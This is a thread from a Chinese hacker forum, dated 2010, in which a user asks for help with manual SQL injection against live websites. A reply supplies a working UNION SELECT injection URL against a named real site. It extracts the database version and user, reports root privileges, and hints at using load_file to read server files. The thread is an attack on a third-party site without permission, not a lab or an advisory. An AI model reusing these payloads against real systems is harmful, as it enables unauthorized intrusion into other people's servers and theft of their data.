[网络问题] 求助安全检测问题

7042 2
乡村农夫 2010-6-20 17:55:44 | 显示全部楼层 |阅读模式
我在学习手工注入的时候发现几个站点都存在注入
and 1=1     正常
and 1=2     错误
但是我在输入:and exists (select * from admin)的时候就出现错误了,不知道怎么办,所有发贴求助一下
希望大鸟们能给我说明白一点谢谢

站点:http://www.donghua-ml.com
HUC-囔村掾夫
灿烂来了 2010-6-22 11:50:55 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
HUC-udb311 2010-6-23 13:51:58 | 显示全部楼层
这个是PHP类型的注入```

通过联合查询是这样的,先判断字段长段

http://www.donghua-ml.com/news_see.php?thisid=42 and 1=2 union select 1,version(),3,4,5,user()
暴出数据库类型和当前用户

权限很大root。

可以loadfile......
知识像烛光,能照亮一个人,也能照亮无数人!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

乡村农夫

中级红客

关注
  • 6
    主题
  • 0
    粉丝
  • 1
    关注
这家伙很懒,什么都没留下!
24小时热帖

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2025 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行